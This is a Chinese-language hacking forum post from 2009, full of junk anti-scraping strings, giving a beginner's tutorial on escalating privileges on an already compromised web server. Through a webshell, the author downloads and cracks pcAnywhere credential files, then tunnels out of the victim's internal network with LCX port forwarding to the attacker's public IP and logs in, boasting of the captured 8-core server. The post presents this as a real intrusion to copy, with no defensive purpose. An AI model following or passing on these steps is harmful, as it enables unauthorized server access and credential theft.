|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。4 s2 j" A/ f3 c# o6 h
! w" [1 n# s: J$ Q
提权方法:pcanywhere+LCX8 J2 B5 G. K) z) x
$ n+ W' c; U. h1 ]' u0 b5 N
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
4 V8 p. a( r. d( B
, D$ Z: n8 B& {5 M在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。, A+ m9 A/ z; {" v, a
& `0 F; @5 i2 |3 n0 M* [
% `& H* N8 `7 J1 o; C
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
! |6 h. a; e4 V% |+ S6 g9 K2 f0 ^8 o- x7 ^7 S
" Y' F. |2 v9 A: T4 @$ Y呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
& l% l7 G5 p" R1 @! \2 P- g! x
( v% v3 |: \# Q) M" {8 D% _7 y
1 ]1 q! p0 G# t! P, B+ ^* Z" n- C+ a3 A/ B/ o3 y0 J% Z
" C8 v( e8 U( v
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦`` O4 |" R+ ^; Y( j
- q; {! |. P6 ]8 d
3 ^2 N6 q& Q _/ u3 C$ Y# cLCX的用法再简单说下:3 i! r! m' o6 ?4 G9 F" C
5 U5 w; l' z! W* @- v% z
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)9 a, S7 W2 Y+ @5 V5 S1 v% o9 c
0 ]9 t C1 T" F- f
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
7 a% z# s+ m8 J4 `% M8 a L- M
* ?& I/ k+ k' n( U2 c由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。- w# g, b* y) P' f2 Y$ R
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``$ E- A& ~3 p6 k
( r, `5 q# {% D' a* D5 ]6 I( k
1 E+ g `6 i9 O( `
1 _; w5 |( ?" N) r/ y
4 p! v/ S5 |9 @7 p; L. w5 C) i呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。# B# A7 q3 F' p
' b5 `% L2 z; q' y
6 I9 J4 R& u, S) D# Q1 e* w( F; j |+ x3 O8 v& w1 A& H: x4 h
2 E( [; K5 Q4 N6 g: M* O$ P
我们本地连接试试,输入我们刚破解的账号密码/ k. \; Z6 t$ X7 e+ z5 H
9 z2 l( H# \2 S1 q R
' D3 Y4 I" \# E& A5 f& I6 F呵呵``连接成功,服务器不错,又一个8核^︵^ A" K/ T; j: Y$ P% Q0 L: u
% T5 a( C3 A5 y, `4 ~) ^* p1 @7 z' B- ~2 X4 _& y' ~
, X) [ I* f; T' M |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
